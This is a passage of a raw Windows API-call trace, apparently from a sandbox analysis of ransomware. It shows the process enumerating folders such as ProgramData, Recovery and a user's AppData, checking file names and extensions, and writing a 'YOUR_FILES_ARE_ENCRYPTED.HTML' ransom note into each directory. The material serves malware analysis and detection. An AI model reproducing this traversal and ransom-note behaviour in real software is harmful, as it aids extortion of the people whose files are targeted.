ftLastAccessTime.dwLowDateTime=0x176f781e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x176f781e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0159.057] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Start Menu") returned 29 [0159.057] GetProcessHeap () returned 0x270000 [0159.057] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0159.057] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\ProgramData\\Start Menu" | out: lpString1="\\\\?\\C:\\ProgramData\\Start Menu") returned="\\\\?\\C:\\ProgramData\\Start Menu" [0159.057] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Start Menu", 
lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Start Menu\\*") returned="\\\\?\\C:\\ProgramData\\Start Menu\\*" [0159.057] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Start Menu\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf73e4600, ftCreationTime.dwHighDateTime=0x1d0d7cf, ftLastAccessTime.dwLowDateTime=0xa1ccb450, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf73e4600, ftLastWriteTime.dwHighDateTime=0x1d0d7cf, nFileSizeHigh=0x0, nFileSizeLow=0x42f, dwReserved0=0x0, dwReserved1=0x60, cFileName="regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag", cAlternateFileName="Hܾ")) returned 0xffffffff [0159.057] GetProcessHeap () returned 0x270000 [0159.058] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0159.058] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x176f781e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x176f781e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x176f781e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0159.058] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Templates") returned 28 [0159.058] GetProcessHeap () returned 0x270000 [0159.058] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0159.058] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\ProgramData\\Templates" | out: lpString1="\\\\?\\C:\\ProgramData\\Templates") returned="\\\\?\\C:\\ProgramData\\Templates" [0159.058] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Templates", lpString2="\\*" 
| out: lpString1="\\\\?\\C:\\ProgramData\\Templates\\*") returned="\\\\?\\C:\\ProgramData\\Templates\\*" [0159.058] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Templates\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf73e4600, ftCreationTime.dwHighDateTime=0x1d0d7cf, ftLastAccessTime.dwLowDateTime=0xa1ccb450, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf73e4600, ftLastWriteTime.dwHighDateTime=0x1d0d7cf, nFileSizeHigh=0x0, nFileSizeLow=0x42f, dwReserved0=0x0, dwReserved1=0x60, cFileName="regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag", cAlternateFileName="Hܾ")) returned 0xffffffff [0159.059] GetProcessHeap () returned 0x270000 [0159.060] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0159.060] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x176f781e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x176f781e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x176f781e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 0 [0159.060] FindClose (in: hFindFile=0x42f30c0 | out: hFindFile=0x42f30c0) returned 1 [0159.060] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 48 [0159.060] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x580 [0159.061] WriteFile 
(in: hFile=0x580, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe744, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe744*=0x3c00, lpOverlapped=0x0) returned 1 [0159.063] CloseHandle (hObject=0x580) returned 1 [0159.063] GetProcessHeap () returned 0x270000 [0159.064] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0159.066] FindNextFileW (in: hFindFile=0x42f2fc0, lpFindFileData=0x4ebe784 | out: lpFindFileData=0x4ebe784*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd0d8ba10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0db1b70, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd0db1b70, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4ebe844, cFileName="Recovery", cAlternateFileName="")) returned 1 [0159.066] wnsprintfW (in: pszDest=0x430df38, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Recovery") returned 15 [0159.066] GetProcessHeap () returned 0x270000 [0159.066] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0159.066] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Recovery" | out: lpString1="\\\\?\\C:\\Recovery") returned="\\\\?\\C:\\Recovery" [0159.066] lstrcatW (in: lpString1="\\\\?\\C:\\Recovery", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Recovery\\*") returned="\\\\?\\C:\\Recovery\\*" [0159.066] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Recovery\\*", lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd0d8ba10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0db1b70, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd0db1b70, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, 
cFileName=".", cAlternateFileName="")) returned 0x42f30c0 [0159.066] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd0d8ba10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0db1b70, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd0db1b70, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0159.066] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd0d8ba10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0d8ba10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd0d8ba10, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2a069262-7156-11eb-8692-cd6fb44c6612", cAlternateFileName="2A0692~1")) returned 1 [0159.067] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Recovery\\2a069262-7156-11eb-8692-cd6fb44c6612") returned 52 [0159.067] GetProcessHeap () returned 0x270000 [0159.067] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74ea160 [0159.068] lstrcpyW (in: lpString1=0x74ea160, lpString2="\\\\?\\C:\\Recovery\\2a069262-7156-11eb-8692-cd6fb44c6612" | out: lpString1="\\\\?\\C:\\Recovery\\2a069262-7156-11eb-8692-cd6fb44c6612") returned="\\\\?\\C:\\Recovery\\2a069262-7156-11eb-8692-cd6fb44c6612" [0159.068] lstrcatW (in: lpString1="\\\\?\\C:\\Recovery\\2a069262-7156-11eb-8692-cd6fb44c6612", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Recovery\\2a069262-7156-11eb-8692-cd6fb44c6612\\*") returned="\\\\?\\C:\\Recovery\\2a069262-7156-11eb-8692-cd6fb44c6612\\*" [0159.069] FindFirstFileW (in: 
lpFileName="\\\\?\\C:\\Recovery\\2a069262-7156-11eb-8692-cd6fb44c6612\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd0d8ba10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0d8ba10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd0d8ba10, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0159.069] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd0d8ba10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0d8ba10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd0d8ba10, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.069] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0xd0d8ba10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0d8ba10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xa527987c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x306000, dwReserved0=0x0, dwReserved1=0x60, cFileName="boot.sdi", cAlternateFileName="")) returned 1 [0159.069] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Recovery\\2a069262-7156-11eb-8692-cd6fb44c6612\\boot.sdi") returned 61 [0159.069] lstrcmpW (lpString1="boot.sdi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.069] PathFindExtensionW (pszPath="boot.sdi") returned=".sdi" [0159.069] lstrlenW (lpString=".sdi") returned 4 [0159.069] PathFindExtensionW 
(pszPath="boot.sdi") returned=".sdi" [0159.069] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0xcb206996, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xcb35dec0, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0xe3a4d930, ftLastWriteTime.dwHighDateTime=0x1cb88c4, nFileSizeHigh=0x0, nFileSizeLow=0x8a8e7ac, dwReserved0=0x0, dwReserved1=0x60, cFileName="Winre.wim", cAlternateFileName="")) returned 1 [0159.069] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Recovery\\2a069262-7156-11eb-8692-cd6fb44c6612\\Winre.wim") returned 62 [0159.069] lstrcmpW (lpString1="Winre.wim", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.069] PathFindExtensionW (pszPath="Winre.wim") returned=".wim" [0159.069] lstrlenW (lpString=".wim") returned 4 [0159.069] PathFindExtensionW (pszPath="Winre.wim") returned=".wim" [0159.069] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0xcb206996, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xcb35dec0, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0xe3a4d930, ftLastWriteTime.dwHighDateTime=0x1cb88c4, nFileSizeHigh=0x0, nFileSizeLow=0x8a8e7ac, dwReserved0=0x0, dwReserved1=0x60, cFileName="Winre.wim", cAlternateFileName="")) returned 0 [0159.069] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0159.069] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Recovery\\2a069262-7156-11eb-8692-cd6fb44c6612\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 82 [0159.070] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\2a069262-7156-11eb-8692-cd6fb44c6612\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: 
"c:\\recovery\\2a069262-7156-11eb-8692-cd6fb44c6612\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0159.070] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0159.072] CloseHandle (hObject=0x4a4) returned 1 [0159.073] GetProcessHeap () returned 0x270000 [0159.074] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ea160 | out: hHeap=0x270000) returned 1 [0159.074] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd0d8ba10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0d8ba10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd0d8ba10, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2a069262-7156-11eb-8692-cd6fb44c6612", cAlternateFileName="2A0692~1")) returned 0 [0159.074] FindClose (in: hFindFile=0x42f30c0 | out: hFindFile=0x42f30c0) returned 1 [0159.074] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Recovery\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 45 [0159.074] CreateFileW (lpFileName="\\\\?\\C:\\Recovery\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\recovery\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x580 [0159.074] WriteFile (in: hFile=0x580, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe744, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, 
lpNumberOfBytesWritten=0x4ebe744*=0x3c00, lpOverlapped=0x0) returned 1 [0159.076] CloseHandle (hObject=0x580) returned 1 [0159.077] GetProcessHeap () returned 0x270000 [0159.078] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0159.078] FindNextFileW (in: hFindFile=0x42f2fc0, lpFindFileData=0x4ebe784 | out: lpFindFileData=0x4ebe784*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfa10b5e0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0xbba05380, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xbba05380, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4ebe844, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0159.078] FindNextFileW (in: hFindFile=0x42f2fc0, lpFindFileData=0x4ebe784 | out: lpFindFileData=0x4ebe784*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa01468f, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xd21ed670, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd21ed670, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4ebe844, cFileName="Users", cAlternateFileName="")) returned 1 [0159.078] wnsprintfW (in: pszDest=0x430df38, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users") returned 12 [0159.078] GetProcessHeap () returned 0x270000 [0159.078] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0159.078] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Users" | out: lpString1="\\\\?\\C:\\Users") returned="\\\\?\\C:\\Users" [0159.078] lstrcatW (in: lpString1="\\\\?\\C:\\Users", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\*") returned="\\\\?\\C:\\Users\\*" [0159.078] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\*", lpFindFileData=0x4ebe478 | out: 
lpFindFileData=0x4ebe478*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa01468f, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xd21ed670, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd21ed670, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f30c0 [0159.078] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa01468f, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xd21ed670, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd21ed670, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0159.078] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd21ed670, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xad545d50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad545d50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5AlR3U30D3", cAlternateFileName="5ALR3U~1")) returned 1 [0159.078] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3") returned 23 [0159.078] GetProcessHeap () returned 0x270000 [0159.078] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74ea160 [0159.078] lstrcpyW (in: lpString1=0x74ea160, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3") returned="\\\\?\\C:\\Users\\5AlR3U30D3" [0159.079] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3", 
lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\*" [0159.079] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd21ed670, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xad545d50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad545d50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0159.079] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd21ed670, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xad545d50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad545d50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.079] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7b4de3da, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="AppData", cAlternateFileName="")) returned 1 [0159.079] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData") returned 31 [0159.079] GetProcessHeap () returned 0x270000 [0159.079] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0159.080] lstrcpyW (in: 
lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData" [0159.080] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\*" [0159.080] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7b4de3da, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0159.080] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x7b4de3da, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.081] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2dae310, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd2dae310, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Local", cAlternateFileName="")) returned 1 [0159.081] wnsprintfW (in: 
pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local") returned 37 [0159.081] GetProcessHeap () returned 0x270000 [0159.081] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0159.083] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local" [0159.083] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\*" [0159.083] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2dae310, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd2dae310, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0159.083] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2dae310, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd2dae310, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 